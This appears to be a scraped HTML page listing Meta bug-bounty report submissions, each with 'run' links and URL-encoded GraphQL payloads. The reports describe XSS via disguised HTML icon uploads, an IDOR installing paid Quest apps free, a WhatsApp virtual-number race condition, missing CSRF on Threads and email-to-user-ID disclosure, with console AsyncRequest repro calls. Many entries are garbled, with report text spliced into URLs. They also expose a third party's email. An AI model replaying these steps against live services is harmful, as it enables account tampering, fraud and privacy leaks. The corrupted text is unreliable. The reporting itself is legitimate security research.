useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=9402602493202387&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%223%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22https%3A%2F%2Fwearables.developer.meta.com%2Fdevcenter+%2C+here+a+user+can+create+a+project%2C+project+has+icon%2C+the+image+upload+here+doesnt+check+if+its+image+or+html%0A%0Axss+on+cdn%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22repro_steps%22%3A%221.+Create+account+here+%3A+https%3A%2F%2Fwearables.developer.meta.com%2Fdevcenter%2F%0A2.+Create+a+project-%3Eproduct+listing%0A3.+Create+a+html+file+and+save+it+as+.png%0A4.+upload+malicous+png+file+as+icon%2C+while+uploading+copy+cdn+url+from+response%0A%0Ademo+https%3A%2F%2Fscontent.fjai2-4.fna.fbcdn.net%2Fm1%2Fv%2Ft0.88565-6%2FAn_q84FTi4yMVKN6SVK43p0PrVeCCG40F5zXLAn7hMtgb6XGTHgOEdZ9G4mmgbvLyzBD8SiwBG2H8ZxznSinVhEArKocGk2VHmikUFGw38q2zGwFPoBz%3F_nc_gid%3DfbhtTE5Ppw5JsJuZgMb19A%26_nc_oc%3DAdkbWjlM3aroBJHJ0vTu2gBop8F__42DVfeNBe7N3TR8H6h6wZt9-Jlyb7CWULEFVlQ%26ccb%3D10-5%26oh%3D00_AfllZFYiEA97GxzsusY7xGa8dO1ma1z1DTsA_4e2S-XwnA%26oe%3D69351FD5%26_nc_sid%3D16955c%22%2C%22source%22%3A%22COMET%22%2C%22subject%22%3A%22xss+on+cdn+using+unrestricted+file+upload%22%2C%22whitehat_private_bounty_type%22%3Anull%7D%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=9402602493202387&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%223%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22https%3A%2F%2Fwearables.developer.meta.com%2Fdevcenter+%2C+here+a+user+can+create+a+project%2C+project+has+icon%2C+the+image+upload+here+doesnt+check+if+its+image+or+html%0A%0Axss+on+cdn%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22repro_steps%22%3A%221.+Create+account+here+%3A+https%3A%2F%2Fwearables.developer.meta.com%2Fdevcenter%2F%0A2.+Create+a+project-%3Eproduct+listing%0A3.+Create+a+html+file+and+save+it+as+.png%0A4.+upload+malicous+png+file+as+icon%2C+while+uploading+copy+cdn+url+from+response%0A%0Ademo+https%3A%2F%2Fscontent.fjai2-4.fna.fbcdn.net%2Fm1%2Fv%2Ft0.88565-6%2FAn_q84FTi4yMVKN6SVK43p0PrVeCCG40F5zXLAn7hMtgb6XGTHgOEdZ9G4mmgbvLyzBD8SiwBG2H8ZxznSinVhEArKocGk2VHmikUFGw38q2zGwFPoBz%3F_nc_gid%3DfbhtTE5Ppw5JsJuZgMb19A%26_nc_oc%3DAdkbWjlM3aroBJHJ0vTu2gBop8F__42DVfeNBe7N3TR8H6h6wZt9-Jlyb7CWULEFVlQ%26ccb%3D10-5%26oh%3D00_AfllZFYiEA97GxzsusY7xGa8dO1ma1z1DTsA_4e2S-XwnA%26oe%3D69351FD5%26_nc_sid%3D16955c%22%2C%22source%22%3A%22COMET%22%2C%22subject%22%3A%22xss+on+cdn+using+unrestricted+file+upload%22%2C%22whitehat_private_bounty_type%22%3Anull%7D%7D">FBDL </a>
    <br>
    {"input":{"client_mutation_id":"3","actor_id":"100033825612932","attachments_v2":[],"collaborators":[],"description":"https://wearables.developer.meta.com/devcenter , here a user can create a project, project has icon, the image upload here doesnt check if its image or html

xss on cdn","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"repro_steps":"1. Create account here : https://wearables.developer.meta.com/devcenter/
2. Create a project->product listing
3. Create a html file and save it as .png
4. upload malicous png file as icon, while uploading copy cdn url from response

demo https://scontent.fjai2-4.fna.fbcdn.net/m1/v/t0.88565-6/An_q84FTi4yMVKN6SVK43p0PrVeCCG40F5zXLAn7hMtgb6XGTHgOEdZ9G4mmgbvLyzBD8SiwBG2H8ZxznSinVhEArKocGk2VHmikUFGw38q2zGwFPoBz?_nc_gid=fbhtTE5Ppw5JsJuZgMb19A&_nc_oc=AdkbWjlM3aroBJHJ0vTu2gBop8F__42DVfeNBe7N3TR8H6h6wZt9-Jlyb7CWULEFVlQ&ccb=10-5&oh=00_AfllZFYiEA97GxzsusY7xGa8dO1ma1z1DTsA_4e2S-XwnA&oe=69351FD5&_nc_sid=16955c","source":"COMET","subject":"xss on cdn using unrestricted file upload","whitehat_private_bounty_type":null}}  <br>9402602493202387    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=4970913202987411&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%225%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22On+Meta.ai%2C+when+a+user+enhances+an+image+with+AI%2C+both+the+image+and+prompt+remain+private+by+default.+However%2C+if+the+user+chooses+to+share+the+image+publicly%2C+it+becomes+permanently+public%E2%80%94even+if+the+prompt+is+later+deleted+or+its+visibility+is+changed+to+%22only+me%22.%0A%0AImagine+accidentally+sharing+something+private+with+AI+on+Meta.ai%2C+only+to+realize+later+that+you+can%2527t+undo+it%2Conce+it%2527s+public%2C+it%2527s+public+forever%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22product_area%22%3A%22505721206438001%22%2C%22repro_steps%22%3A%221.+Create+two+accounts+on+meta.ai%0A2.+Using+one+account+upload+an+image+and+ask+AI+to+enhance+it+or+some+edits%2C+and+share+it%0A3.+Copy+imageID%2C+its+either+base64+encoded+value+or+numeric+value%0A4.Delete+prompt%0A5.+Using+attacker+account+call+this+on+console+%0A%0Anew+require%28%2527AsyncRequest%2527%29%0Anew+AsyncRequest%28%2527%2Fapi%2Fgraphql%3Fdoc_id%3D9965933940118400%26variables%3D%7B%22media_id%22%3A%22ul2PDIvMeC4%22%2C%22prompt_id%22%3A%22%22%2C%22prompt_id_is_null%22%3Atrue%2C%22__relay_internal__pv__KadabraImagineCanvasDevSettingsrelayprovider%22%3Afalse%7D%2527%29.send%28%29%22%2C%22source%22%3A%22COMET%22%2C%22subject%22%3A%22%5BMeta.ai%5D+images+remain+accessible+to+any+user%2C+even+if+the+original+prompt+is+deleted+or+set+to+%22only+me%22.%22%2C%22vuln_type%22%3A%22159350064619250%22%2C%22whitehat_private_bounty_type%22%3Anull%7D%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=4970913202987411&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%225%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22On+Meta.ai%2C+when+a+user+enhances+an+image+with+AI%2C+both+the+image+and+prompt+remain+private+by+default.+However%2C+if+the+user+chooses+to+share+the+image+publicly%2C+it+becomes+permanently+public%E2%80%94even+if+the+prompt+is+later+deleted+or+its+visibility+is+changed+to+%22only+me%22.%0A%0AImagine+accidentally+sharing+something+private+with+AI+on+Meta.ai%2C+only+to+realize+later+that+you+can%2527t+undo+it%2Conce+it%2527s+public%2C+it%2527s+public+forever%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22product_area%22%3A%22505721206438001%22%2C%22repro_steps%22%3A%221.+Create+two+accounts+on+meta.ai%0A2.+Using+one+account+upload+an+image+and+ask+AI+to+enhance+it+or+some+edits%2C+and+share+it%0A3.+Copy+imageID%2C+its+either+base64+encoded+value+or+numeric+value%0A4.Delete+prompt%0A5.+Using+attacker+account+call+this+on+console+%0A%0Anew+require%28%2527AsyncRequest%2527%29%0Anew+AsyncRequest%28%2527%2Fapi%2Fgraphql%3Fdoc_id%3D9965933940118400%26variables%3D%7B%22media_id%22%3A%22ul2PDIvMeC4%22%2C%22prompt_id%22%3A%22%22%2C%22prompt_id_is_null%22%3Atrue%2C%22__relay_internal__pv__KadabraImagineCanvasDevSettingsrelayprovider%22%3Afalse%7D%2527%29.send%28%29%22%2C%22source%22%3A%22COMET%22%2C%22subject%22%3A%22%5BMeta.ai%5D+images+remain+accessible+to+any+user%2C+even+if+the+original+prompt+is+deleted+or+set+to+%22only+me%22.%22%2C%22vuln_type%22%3A%22159350064619250%22%2C%22whitehat_private_bounty_type%22%3Anull%7D%7D">FBDL </a>
    <br>
    {"input":{"client_mutation_id":"5","actor_id":"100033825612932","attachments_v2":[],"collaborators":[],"description":"On Meta.ai, when a user enhances an image with AI, both the image and prompt remain private by default. However, if the user chooses to share the image publicly, it becomes permanently public—even if the prompt is later deleted or its visibility is changed to "only me".

Imagine accidentally sharing something private with AI on Meta.ai, only to realize later that you can%27t undo it,once it%27s public, it%27s public forever","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"product_area":"505721206438001","repro_steps":"1. Create two accounts on meta.ai
2. Using one account upload an image and ask AI to enhance it or some edits, and share it
3. Copy imageID, its either base64 encoded value or numeric value
4.Delete prompt
5. Using attacker account call this on console 

new require(%27AsyncRequest%27)
new AsyncRequest(%27/api/graphql?doc_id=9965933940118400&variables={"media_id":"ul2PDIvMeC4","prompt_id":"","prompt_id_is_null":true,"__relay_internal__pv__KadabraImagineCanvasDevSettingsrelayprovider":false}%27).send()","source":"COMET","subject":"[Meta.ai] images remain accessible to any user, even if the original prompt is deleted or set to "only me".","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}  <br>4970913202987411    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=7482680791844416&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22log_session_id%22%3A%22fb266cc1b57e0706c%22%2C%22app_id%22%3A%221105469744241801%22%2C%22waba_id%22%3A%22426104740578633%22%2C%22onboarding_source%22%3A%22EMBEDDED_SIGNUP_2%22%2C%22display_name%22%3A%22New+Killldosidthedre%22%2C%22business_profile%22%3A%7B%22description%22%3A%22%22%2C%22vertical_class%22%3A%22EVENT_PLAN%22%2C%22website%22%3A%22https%3A%2F%2Fters.com%2F%22%2C%22websites%22%3A%5B%22https%3A%2F%2Fters.com%2F%22%5D%7D%2C%22partner_business_id%22%3A735040197522676%7D%7D%0A%0A%0ANOTE+%3A+Virtual+numbers+and+test+numbers+may+look+similar+but+serve+different+purposes.+Test+numbers+can+only+send+messages+to+admins%2C+while+virtual+numbers+work+like+real+WhatsApp+numbers.%22%2C%22source%22%3A%22COMET%22%2C%22subject%22%3A%22race+condition+%3A+create+lots+of+free+virtual+number+for+whatsapp%22%2C%22vuln_type%22%3A%22159350064619250%22%2C%22whitehat_private_bounty_type%22%3Anull%7D%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=7482680791844416&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22log_session_id%22%3A%22fb266cc1b57e0706c%22%2C%22app_id%22%3A%221105469744241801%22%2C%22waba_id%22%3A%22426104740578633%22%2C%22onboarding_source%22%3A%22EMBEDDED_SIGNUP_2%22%2C%22display_name%22%3A%22New+Killldosidthedre%22%2C%22business_profile%22%3A%7B%22description%22%3A%22%22%2C%22vertical_class%22%3A%22EVENT_PLAN%22%2C%22website%22%3A%22https%3A%2F%2Fters.com%2F%22%2C%22websites%22%3A%5B%22https%3A%2F%2Fters.com%2F%22%5D%7D%2C%22partner_business_id%22%3A735040197522676%7D%7D%0A%0A%0ANOTE+%3A+Virtual+numbers+and+test+numbers+may+look+similar+but+serve+different+purposes.+Test+numbers+can+only+send+messages+to+admins%2C+while+virtual+numbers+work+like+real+WhatsApp+numbers.%22%2C%22source%22%3A%22COMET%22%2C%22subject%22%3A%22race+condition+%3A+create+lots+of+free+virtual+number+for+whatsapp%22%2C%22vuln_type%22%3A%22159350064619250%22%2C%22whitehat_private_bounty_type%22%3Anull%7D%7D">FBDL </a>
    <br>
    {"input":{"client_mutation_id":"1","actor_id":"100033825612932","log_session_id":"fb266cc1b57e0706c","app_id":"1105469744241801","waba_id":"426104740578633","onboarding_source":"EMBEDDED_SIGNUP_2","display_name":"New Killldosidthedre","business_profile":{"description":"","vertical_class":"EVENT_PLAN","website":"https://ters.com/","websites":["https://ters.com/"]},"partner_business_id":735040197522676}}


NOTE : Virtual numbers and test numbers may look similar but serve different purposes. Test numbers can only send messages to admins, while virtual numbers work like real WhatsApp numbers.","source":"COMET","subject":"race condition : create lots of free virtual number for whatsapp","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}  <br>7482680791844416    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=25858811387100015&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%222%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22Meta+quest+for+business+%3A++read+here+https%3A%2F%2Fforwork.meta.com%2Fquest%2Fbusiness-subscription%0A%0Abasically+its+like+workplace%2C+but+also+allows+to+do+something+with+meta+quest+device.%0A%0Ahere+there+is+a+feature+which+shows+work+related+apps+to+install+into+meta+quest+device%2C+the+graphql+request+which+is+responsible+for+doing+this+is+vuln+with+IDOR+and+allows+any+app+to+get+installed+regardless+if+its+paid+or+free.%0A%0Afree+free+free+games%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22product_area%22%3A%221831817386847453%22%2C%22repro_steps%22%3A%221.+Create+an+account+on+work.meta.com%2Cadd+device+and+call+this+on+console+%0A%0Anew+AsyncRequest%28%2527%2Fapi%2Fgraphql%3Fvariables%3D%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%2261563045021996%22%2C%22oc_application_id%22%3A%22APP_ID%22%7D%2C%22app_id%22%3A%22APP_ID%22%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=25858811387100015&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%222%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22Meta+quest+for+business+%3A++read+here+https%3A%2F%2Fforwork.meta.com%2Fquest%2Fbusiness-subscription%0A%0Abasically+its+like+workplace%2C+but+also+allows+to+do+something+with+meta+quest+device.%0A%0Ahere+there+is+a+feature+which+shows+work+related+apps+to+install+into+meta+quest+device%2C+the+graphql+request+which+is+responsible+for+doing+this+is+vuln+with+IDOR+and+allows+any+app+to+get+installed+regardless+if+its+paid+or+free.%0A%0Afree+free+free+games%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22product_area%22%3A%221831817386847453%22%2C%22repro_steps%22%3A%221.+Create+an+account+on+work.meta.com%2Cadd+device+and+call+this+on+console+%0A%0Anew+AsyncRequest%28%2527%2Fapi%2Fgraphql%3Fvariables%3D%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%2261563045021996%22%2C%22oc_application_id%22%3A%22APP_ID%22%7D%2C%22app_id%22%3A%22APP_ID%22%7D">FBDL </a>
    <br>
    {"input":{"client_mutation_id":"2","actor_id":"100033825612932","attachments_v2":[],"collaborators":[],"description":"Meta quest for business :  read here https://forwork.meta.com/quest/business-subscription

basically its like workplace, but also allows to do something with meta quest device.

here there is a feature which shows work related apps to install into meta quest device, the graphql request which is responsible for doing this is vuln with IDOR and allows any app to get installed regardless if its paid or free.

free free free games","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"product_area":"1831817386847453","repro_steps":"1. Create an account on work.meta.com,add device and call this on console 

new AsyncRequest(%27/api/graphql?variables={"input":{"client_mutation_id":"1","actor_id":"61563045021996","oc_application_id":"APP_ID"},"app_id":"APP_ID"}  <br>25858811387100015    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=8108975709165912


click on above link, it will change basic details of account, including making private account to public","source":"COMET","subject":"[threads.net] - No csrf protection","vuln_type":"309076739565597","whitehat_private_bounty_type":null}}&variables=%7B%22external_url%22%3A%22https%3A%2F%2Ftest.com%22%2C%22biography%22%3A%22I+hack+Internet+for+Fun+an%22%2C%22is_private%22%3Afalse%2C%22profile_picture_upload_id%22%3Anull%2C%22remove_profile_picture%22%3Afalse%2C%22copy_ig_profile_picture_to_text_post_app%22%3Afalse%2C%22__relay_internal__pv__BarcelonaIsLinkVerificationEnabledrelayprovider%22%3Afalse%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=8108975709165912


click on above link, it will change basic details of account, including making private account to public","source":"COMET","subject":"[threads.net] - No csrf protection","vuln_type":"309076739565597","whitehat_private_bounty_type":null}}&variables=%7B%22external_url%22%3A%22https%3A%2F%2Ftest.com%22%2C%22biography%22%3A%22I+hack+Internet+for+Fun+an%22%2C%22is_private%22%3Afalse%2C%22profile_picture_upload_id%22%3Anull%2C%22remove_profile_picture%22%3Afalse%2C%22copy_ig_profile_picture_to_text_post_app%22%3Afalse%2C%22__relay_internal__pv__BarcelonaIsLinkVerificationEnabledrelayprovider%22%3Afalse%7D">FBDL </a>
    <br>
    {"external_url":"https://test.com","biography":"I hack Internet for Fun an","is_private":false,"profile_picture_upload_id":null,"remove_profile_picture":false,"copy_ig_profile_picture_to_text_post_app":false,"__relay_internal__pv__BarcelonaIsLinkVerificationEnabledrelayprovider":false}  <br>8108975709165912


click on above link, it will change basic details of account, including making private account to public","source":"COMET","subject":"[threads.net] - No csrf protection","vuln_type":"309076739565597","whitehat_private_bounty_type":null}}    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=26534466229485935&variables=%7B%22applicationID%22%3A%22%5BAPP_ID%5D%22%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=26534466229485935&variables=%7B%22applicationID%22%3A%22%5BAPP_ID%5D%22%7D">FBDL </a>
    <br>
    {"applicationID":"[APP_ID]"}  <br>26534466229485935    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=7595436947177368&variables=%7B%22releaseChannelID%22%3A%22%3Crelease_channel_id%3E%22%7D%0A%0Ain+response+look+for+%22share_token%22%2C+as+copy+this+value%0A%0A5.+As+UserOther+call+the+request+on+console+as+asyncRequest+%3A%0A%0Anew+AsyncRequest%28%2527https%3A%2F%2Fwww.oculus.com%2Fexperiences%2Fapp%2F7511991128869408%2Frelease-channels%2F1408163293172550%2Fjoin%3Ftoken%3D%3CTOKEN+HERE%3E%2527%29.send%28%29%0A%0Areplace+app+ID+and+Release+Channel+ID%2C+from+older+invite+link+which+is+no+longer+working%0A%0Ain+response+it+should+not+return+any+error%2C+If+everything+goes+smooth%2C+UserOther+will+be+able+to+join+release+channel%22%2C%22source%22%3A%22COMET%22%2C%22subject%22%3A%22a+user+in+release+channel+can+see+invite+link%2C+which+allows+other+user+to+join+release+channel%22%2C%22vuln_type%22%3A%22159350064619250%22%2C%22whitehat_private_bounty_type%22%3Anull%7D%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=7595436947177368&variables=%7B%22releaseChannelID%22%3A%22%3Crelease_channel_id%3E%22%7D%0A%0Ain+response+look+for+%22share_token%22%2C+as+copy+this+value%0A%0A5.+As+UserOther+call+the+request+on+console+as+asyncRequest+%3A%0A%0Anew+AsyncRequest%28%2527https%3A%2F%2Fwww.oculus.com%2Fexperiences%2Fapp%2F7511991128869408%2Frelease-channels%2F1408163293172550%2Fjoin%3Ftoken%3D%3CTOKEN+HERE%3E%2527%29.send%28%29%0A%0Areplace+app+ID+and+Release+Channel+ID%2C+from+older+invite+link+which+is+no+longer+working%0A%0Ain+response+it+should+not+return+any+error%2C+If+everything+goes+smooth%2C+UserOther+will+be+able+to+join+release+channel%22%2C%22source%22%3A%22COMET%22%2C%22subject%22%3A%22a+user+in+release+channel+can+see+invite+link%2C+which+allows+other+user+to+join+release+channel%22%2C%22vuln_type%22%3A%22159350064619250%22%2C%22whitehat_private_bounty_type%22%3Anull%7D%7D">FBDL </a>
    <br>
    {"releaseChannelID":"<release_channel_id>"}

in response look for "share_token", as copy this value

5. As UserOther call the request on console as asyncRequest :

new AsyncRequest(%27https://www.oculus.com/experiences/app/7511991128869408/release-channels/1408163293172550/join?token=<TOKEN HERE>%27).send()

replace app ID and Release Channel ID, from older invite link which is no longer working

in response it should not return any error, If everything goes smooth, UserOther will be able to join release channel","source":"COMET","subject":"a user in release channel can see invite link, which allows other user to join release channel","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}  <br>7595436947177368    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=25472786462365728

replace values and done, It will send collab request to victim without having valid code of victim, we can send multiple invitaitons too","source":"COMET","subject":"[Work Meta] Invite any organization/company for external relationship without having "relationship ID"","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}&variables=%7B%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=25472786462365728

replace values and done, It will send collab request to victim without having valid code of victim, we can send multiple invitaitons too","source":"COMET","subject":"[Work Meta] Invite any organization/company for external relationship without having "relationship ID"","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}&variables=%7B%7D">FBDL </a>
    <br>
    {}  <br>25472786462365728

replace values and done, It will send collab request to victim without having valid code of victim, we can send multiple invitaitons too","source":"COMET","subject":"[Work Meta] Invite any organization/company for external relationship without having "relationship ID"","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=24595242403452990&variables=%7Binput%3A%7Buserlists%3A%5B1324394708243370%5D%2Crelease_channel_id%3A%221345355396178148%22%7D%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=24595242403452990&variables=%7Binput%3A%7Buserlists%3A%5B1324394708243370%5D%2Crelease_channel_id%3A%221345355396178148%22%7D%7D">FBDL </a>
    <br>
    {input:{userlists:[1324394708243370],release_channel_id:"1345355396178148"}}  <br>24595242403452990    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=5566956313411189&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%2210%22%2C%22userlist_id%22%3A%221104277373927150%22%2C%22user_emails%22%3A%5B%22jan26one%40optoelectronicsltd.com%22%5D%7D%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=5566956313411189&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%2210%22%2C%22userlist_id%22%3A%221104277373927150%22%2C%22user_emails%22%3A%5B%22jan26one%40optoelectronicsltd.com%22%5D%7D%7D">FBDL </a>
    <br>
    {"input":{"client_mutation_id":"10","userlist_id":"1104277373927150","user_emails":["jan26one@optoelectronicsltd.com"]}}  <br>5566956313411189    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=6976127939112262&variables=%7B%22releaseChannelID%22%3A%221091119095413653%22%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=6976127939112262&variables=%7B%22releaseChannelID%22%3A%221091119095413653%22%7D">FBDL </a>
    <br>
    {"releaseChannelID":"1091119095413653"}  <br>6976127939112262    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=6942317155827346


response : 

{"node":{"email":"sehalmittal1\u0040gmail.com","alias":"websitedonee","is_employee":false,"__typename":"XOCUserlistUser"}

here alias is username of supplied email","source":"COMET","subject":"inverse email address disclosure","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22Feature+%3A+%22Release+channels%22+let+you+distribute+early+versions+of+your+builds+to+limited+audiences+for+testing+or+other+purposes.+You+can+create+public+channels+for+users+to+subscribe+to%2C+or+invite+different+groups+of+people+to+private+release+channels.%0A%0ARead+more+here+%3A+https%3A%2F%2Fdeveloper.oculus.com%2Fresources%2Fpublish-release-channels%2F%0A%0ABug+%3A+When+we+invite+a+user+using+email+address%2C+It+returns+UID+of+user+in+graphql+request+which+shows+pending+invitation%0A%0A%0ANOTE+%3A+I+reported+similiar+report+months+ago+where+%225302791553159678%22++DOC+ID+were+vuln.+Meta+fixed+this+issue+by+returning+null+in+the+field+of+UID%2C+However%2C+Now+Team+has+made+some+changes+and+a+new+doc+id%286942317155827346%29+is+replaced+which+is+vuln.%0A%0Aemail+to+UID+of+meta%2Foculus+user%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22product_area%22%3A%221831817386847453%22%2C%22repro_steps%22%3A%221.+Login+into+oculus+account+and+navigate+to+developer.oculus.com%2Fmanage%2C+Then%0Aa%29First+create+an+Organization%0Ab%29Then+create+a+New+App%0A%0A%0A2.+After+creating+App%2C+navigate+to+MyApps-%3ESelect+App+which+you+have+recently+created-%3EOn+left+side+panel+click+on+Distribution-%3ERelease+channels-%3EAdd+new+user+using+Email%0A%0A3.+After+inviting+victim+into+Channels%2C+call+graphql+request+which+shows+pending+list+of+users%0A%0A%0A%3EGraphQL+which+shows+pending+user+%3A%0A%0Avariables%3D%7B%22after%22%3Anull%2C%22first%22%3A20%2C%22search_term%22%3A%22%22%2C%22user_type%22%3A%22PENDING_EMAIL_INVITE%22%2C%22id%22%3A%22908202637214174%22%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=6942317155827346


response : 

{"node":{"email":"sehalmittal1\u0040gmail.com","alias":"websitedonee","is_employee":false,"__typename":"XOCUserlistUser"}

here alias is username of supplied email","source":"COMET","subject":"inverse email address disclosure","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22Feature+%3A+%22Release+channels%22+let+you+distribute+early+versions+of+your+builds+to+limited+audiences+for+testing+or+other+purposes.+You+can+create+public+channels+for+users+to+subscribe+to%2C+or+invite+different+groups+of+people+to+private+release+channels.%0A%0ARead+more+here+%3A+https%3A%2F%2Fdeveloper.oculus.com%2Fresources%2Fpublish-release-channels%2F%0A%0ABug+%3A+When+we+invite+a+user+using+email+address%2C+It+returns+UID+of+user+in+graphql+request+which+shows+pending+invitation%0A%0A%0ANOTE+%3A+I+reported+similiar+report+months+ago+where+%225302791553159678%22++DOC+ID+were+vuln.+Meta+fixed+this+issue+by+returning+null+in+the+field+of+UID%2C+However%2C+Now+Team+has+made+some+changes+and+a+new+doc+id%286942317155827346%29+is+replaced+which+is+vuln.%0A%0Aemail+to+UID+of+meta%2Foculus+user%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22product_area%22%3A%221831817386847453%22%2C%22repro_steps%22%3A%221.+Login+into+oculus+account+and+navigate+to+developer.oculus.com%2Fmanage%2C+Then%0Aa%29First+create+an+Organization%0Ab%29Then+create+a+New+App%0A%0A%0A2.+After+creating+App%2C+navigate+to+MyApps-%3ESelect+App+which+you+have+recently+created-%3EOn+left+side+panel+click+on+Distribution-%3ERelease+channels-%3EAdd+new+user+using+Email%0A%0A3.+After+inviting+victim+into+Channels%2C+call+graphql+request+which+shows+pending+list+of+users%0A%0A%0A%3EGraphQL+which+shows+pending+user+%3A%0A%0Avariables%3D%7B%22after%22%3Anull%2C%22first%22%3A20%2C%22search_term%22%3A%22%22%2C%22user_type%22%3A%22PENDING_EMAIL_INVITE%22%2C%22id%22%3A%22908202637214174%22%7D">FBDL </a>
    <br>
